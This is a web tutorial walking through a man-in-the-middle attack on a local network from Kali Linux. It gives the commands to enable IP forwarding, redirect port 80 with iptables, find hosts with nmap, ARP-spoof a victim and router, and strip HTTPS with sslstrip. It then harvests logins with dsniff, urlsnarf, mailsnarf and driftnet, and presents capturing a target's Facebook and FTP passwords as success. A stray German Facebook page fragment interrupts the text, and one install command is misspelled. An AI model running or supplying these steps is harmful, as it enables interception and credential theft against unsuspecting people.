As per Wikipedia source, In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.
A MITM attack (a type of eavesdropping attack) allows a malicious actor to intercept, send and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late.
In this tutorial we will be working with a Linux distribution called Kali Linux 2017.1 as it comes with all the tools we need pre-installed like arpspoof, sslstrip, dsniff, iptables etc.
If you want to use some other Linux distributions, then you can easily install these tools by typing the following commands:
sudo apt-get install aprspoof && sudo apt-get install sslstrip && sudo apt-get install dsniff
Here’s the complete Scenario:
- Victim’s Machine – Windows XP (192.168.179.147)
- Attacker’s Machine – Kali Linux (192.168.179.146)
- Router’s IP Address – Gateway (192.168.179.2)
For packet forwarding, you need to open a new terminal and type “echo 1 > /proc/sys/net/ipv4/ip_forward“.
This will allow us to provide and forward traffic from attacking machine to the victim machine. You can also use below command to enable packet forwarding.
sysctl -w net.ipv4.ip_forward=1
If your machine isn’t forwarding the packets, the internet connection of the user will freeze and therefore the attack will be useless.
Now in second step, we need to configure the iptables in such a way that so that it can redirect all the traffic from Port 80 to Port 8080.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
Next task is to find the default gateway of the router, which you can easily find out by typing “route -n” in your terminal. So in this case, our default gateway address is “192.168.179.2“.
To find Target IP address, you can use any of the social engineering method or you can run Nmap command to find out all the alive hosts in your network by typing “nmap -sP 192.168.179.1/24“.
Now the next step is to setup a arpspoof between victim and router. Arpspoof is a command line utility that allows you to intercept packets on a switched LAN. This is an extremely effective way of sniffing traffic on a switch.
arpspoof -i [Interface Name] -t [Victim’s IP] -r [Router’s IP]
So in our case,
- -i = eth0
- -t = 192.168.179.147
- -r = 192.168.179.2
So the final command will be:
arpspoof -i eth0 -t 192.168.179.147 -r 192.168.179.2
The above process will monitor the packet flow from victim to the router. Now to sniff HTTP Packets, you can use Ettercap tool which is one of the most popular sniffing tool but now a days, as you all knows more than 40% sites are now on HTTPS, so to sniff HTTPS packets, we’ll use SSLSTRIP.
SSLStrip transparently hijack HTTP traffic on a network, look for HTTPS links and redirects, then map those connections into either resembles the other alike HTTP connections or homograph-comparable HTTPS links. To start or listen sslstrip, the command is “sslstrip -l 8080“.
When the victim machine visits a website all of the https traffic will be forwarded to attacking machine. In our case, we’re trying to access
Melde dich bei Facebook an, um dich mit deinen Freunden, deiner Familie und Personen, die du kennst, zu verbinden und Inhalte zu teilen.
In above screen, as you can see, we successfully sniffed the HTTPS packets in a clear text manner which includes a login email and login password of target’s facebook account.
Now further more, if you want to sniff more data of some other protocols like FTP, HTTP, SNMP, POP, LDAP etc then we’ll use Dsniff Tool which is also pre-installed in Kali Linux machine.
To use Dsniff, open a new terminal and type “dsniff -i eth0“.
In above screenshot, we successfully sniffed the login and password information of FTP protocol.
Make sure that your interface name will be correct, and if you are using Wireless Interface then put your wireless interface into promiscuous mode first and then run dsniff tool.
To sniff only images, you can use “driftnet-i eth0“.
To sniff only URL’s information, you can use “urlsnarf -i eth0“.
To sniff SMTP mail traffic, you can use “mailsnarf -i eth0“.
Once you are done with your attack, remember to disable the packet forwarding in the system again executing the following command on a terminal:
sysctl -w net.ipv4.ip_forward=0